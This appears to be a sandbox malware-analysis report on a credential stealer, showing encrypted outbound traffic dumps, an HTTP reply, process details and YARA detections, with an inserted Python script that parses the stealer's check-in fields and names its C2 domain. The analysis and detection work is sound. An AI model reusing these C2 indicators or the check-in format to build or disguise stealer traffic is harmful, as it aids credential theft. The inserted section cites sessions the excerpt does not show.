                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 38 c7 90 e5 1d 88 72 00 ba 8f 5a 17 c6 f9 89 15 90 d4 08 ba c1 dd a0 c8 07 71 ed 07 e6 94 19 a1 ee 44 81 41 7c 6a dd 71 9f b5 7d 2d 66 2a 92 9b 80 5a 91 fb 52 b6 9b 0d 07 41 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0
                                                                                  Data Ascii: 8rZqDA|jq}-f*ZRAZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}o*e
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 15 95 03 ba ca b0 17 6f f9 73 d0 ae c8 17 ab 26 5a bc 39 44 f6 5c bd fb e8 dc 10 7f 86 54 e5 a3 0c 7f d3 f8 5c 9d b6 32 77 68 72 4e 87 b9 7b f8 db ea 51 7e ce 90 c9 cc b1 fa 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10
                                                                                  Data Ascii: os&Z9D\T\2whrN{Q~jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe|n`'G'D$xRQS4mN|u0k]%LN@Oj|W1|i1d ]w_e9^+$
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: c6 e3 88 c8 41 9f f7 86 79 70 48 00 ef db b2 cd c2 43 b6 34 4a 12 5c df ec 51 5e c2 bd 62 45 7b 25 63 68 ea 08 c8 53 88 0b ed 72 d9 78 3f f7 32 c8 68 57 aa 0d 3a ec 65 93 ee 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72
                                                                                  Data Ascii: AypHC4J\Q^bE{%chSrx?2hW:ew0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 1c 61 82 b0 9d e2 6a ac d7 0f 21 5b 92 6d 82 97 7a 0d 0a d6 60 62 4a 31 09 36 36 a4 59 67 0c f5 fa 6c 16 a0 d4 0a 92 36 61 48 98 a3 05 ea 43 67 86 ab 9b 21 2a 0e 91 8c e1 b9 be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46
                                                                                  Data Ascii: aj![mz`bJ166Ygl6aHCg!*j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF
                                                                                  2024-10-29 11:05:42 UTC | 1020 | IN | HTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:05:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=e89gjrilahh24rrj40jtig2n1c; expires=Sat, 22 Feb 2025 04:51:50 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LU0bGTBLHmpGc5ky2qKEyOpM27GZPYWPXgzowGdhm9HBI7OVkT86bKkDkYM27SjPHDJHkK39LYDFQPtT2quDo6aC0%2FlUiDLGbMescWUNnepDjV26hSTsIKrLJm3C7%2Bzf69qtPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2b05dcab96c79-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1042&sent=218&recv=613&lost=0&retrans=0&sent_bytes=2845&recv_bytes=573959&delivery_rate=2618444&cwnd=251&unsent_bytes=0&cid=1bfbb8fa272ff413&ts=32910&x=0"
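The check-ins in sessions 5 and 6 have the same shape as the session 4 exchange above: a POST /api whose multipart/form-data body carries hwid, pid and lid fields (the same boundary string in every session), followed by the encrypted payload, and answered by a chunked "ok <IPv4>" reply. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It rebuilds the session 5 request fragment and the session 4 reply from the hex bytes the report prints, parses the multipart parts while flagging the part that the truncated dump cuts off (the report shows only the first fragment of the 1227-byte body), and decodes the chunked reply. The report does not say what the IPv4 address in the reply denotes; the example only extracts it.

```python
import re

# Values taken from the request headers the report shows for sessions 5 and 6.
BOUNDARY = "be85de5ipdocierre1"
REPORT_CONTENT_LENGTH = 1227

# Hex copied from the report's "Data Raw" line for session 5. Only the first fragment of the
# 1227-byte body is printed there, so the dump stops part-way through the "lid" value.
REPORT_BODY_HEX = (
    "2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a "                # --be85de5ipdocierre1 CRLF
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "                                     # ... name="hwid" CRLF CRLF
    "38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a "
    "2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a "                               # ... name="pid", value 1
    "2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e"  # ... name="lid", cut off
)

# The two inbound fragments of the session 4 reply (23 + 5 bytes), copied from the report.
REPORT_REPLY_HEX = "31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a 30 0d 0a 0d 0a"


def parse_form_parts(body: bytes, boundary: str) -> dict:
    """Parse the multipart/form-data parts present in a possibly truncated body.

    Returns {name: {"value": bytes, "complete": bool}}. A part counts as complete only
    when a delimiter follows its value, so the last part of a cut-off capture is
    reported as incomplete instead of being silently accepted as a whole value.
    """
    delim = b"\r\n--" + boundary.encode()
    # RFC 2046: every delimiter is preceded by CRLF except the first. Prepending one
    # lets a single split find all of them and drop the CRLF that ends each value.
    chunks = (b"\r\n" + body).split(delim)
    last = len(chunks) - 1
    parts = {}
    for i, chunk in enumerate(chunks[1:], start=1):   # chunks[0] is the preamble
        if chunk.startswith(b"--"):
            break                                       # closing delimiter "--boundary--"
        if not chunk.startswith(b"\r\n"):
            break                                       # cut inside the delimiter line
        headers, sep, value = chunk[2:].partition(b"\r\n\r\n")
        if not sep:
            break                                       # part headers cut off
        m = re.search(rb'name="([^"]*)"', headers)
        if m is None:
            continue                                    # unnamed part; nothing to key on
        parts[m.group(1).decode("ascii", "replace")] = {"value": value, "complete": i < last}
    return parts


def decode_chunked(data: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coding body; chunk extensions are ignored."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)                  # ValueError if the size line is cut off
        size = int(data[pos:eol].split(b";")[0], 16)
        if size == 0:
            return bytes(out)
        start = eol + 2
        if len(data) < start + size + 2:
            raise ValueError("chunked body truncated")
        out += data[start:start + size]
        pos = start + size + 2                          # skip the CRLF after the chunk data


def summarize_checkin(body: bytes, content_length: int, boundary: str, reply: bytes) -> dict:
    """Pull the identifiers out of one check-in and record what the capture is missing."""
    parts = parse_form_parts(body, boundary)
    text = decode_chunked(reply)
    m = re.fullmatch(rb"ok (\d{1,3}(?:\.\d{1,3}){3})", text)

    def field(name):
        return parts[name]["value"].decode("ascii", "replace") if name in parts else None

    return {
        "hwid": field("hwid"),
        "pid": field("pid"),
        "lid": field("lid"),
        "lid_complete": parts["lid"]["complete"] if "lid" in parts else None,
        "captured_bytes": len(body),
        "missing_bytes": content_length - len(body),    # payload the dump does not show
        "reply": text.decode("ascii", "replace"),
        "reply_ip": m.group(1).decode() if m else None,
    }


if __name__ == "__main__":
    summary = summarize_checkin(bytes.fromhex(REPORT_BODY_HEX), REPORT_CONTENT_LENGTH,
                                BOUNDARY, bytes.fromhex(REPORT_REPLY_HEX))
    for key, value in summary.items():
        print(f"{key:>15}: {value}")
```

Running the file prints the three identifiers, marks lid as incomplete, and reports how many of the declared 1227 bytes the dump omits. Fed a full capture instead of the report excerpt, the same functions give a triage script the hwid/pid/lid field set, the reused boundary string and the "ok <ip>" reply to key on, which survive a change of hostname where a match on necklacedmny.store alone would not.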



                                                                                  Target ID:0
                                                                                  Start time:07:04:06
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0xd0000
                                                                                  File size:2'922'496 bytes
                                                                                  MD5 hash:DC20EE0AC31F3E17CBD727DE4644F7AA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2556757347.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2556801144.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000003.2571986985.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D94000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_3_d93000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction ID: 500d25b9c4c7a94e61a0b8a8d3a54cda3ea3f931e20cf92cfe7b458ae8b26443
                                                                                    • Opcode Fuzzy Hash: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction Fuzzy Hash: 888153300093D69FCB17CF38CAA5696BFA2BF03318B1D46DDD8C18E263D261A955C766
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000003.2571986985.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D93000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_3_d93000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction ID: 500d25b9c4c7a94e61a0b8a8d3a54cda3ea3f931e20cf92cfe7b458ae8b26443
                                                                                    • Opcode Fuzzy Hash: d1053743d4c4d7c9d146bb065af3f90350072d3bf3d67ca1712d92f6755846e6
                                                                                    • Instruction Fuzzy Hash: 888153300093D69FCB17CF38CAA5696BFA2BF03318B1D46DDD8C18E263D261A955C766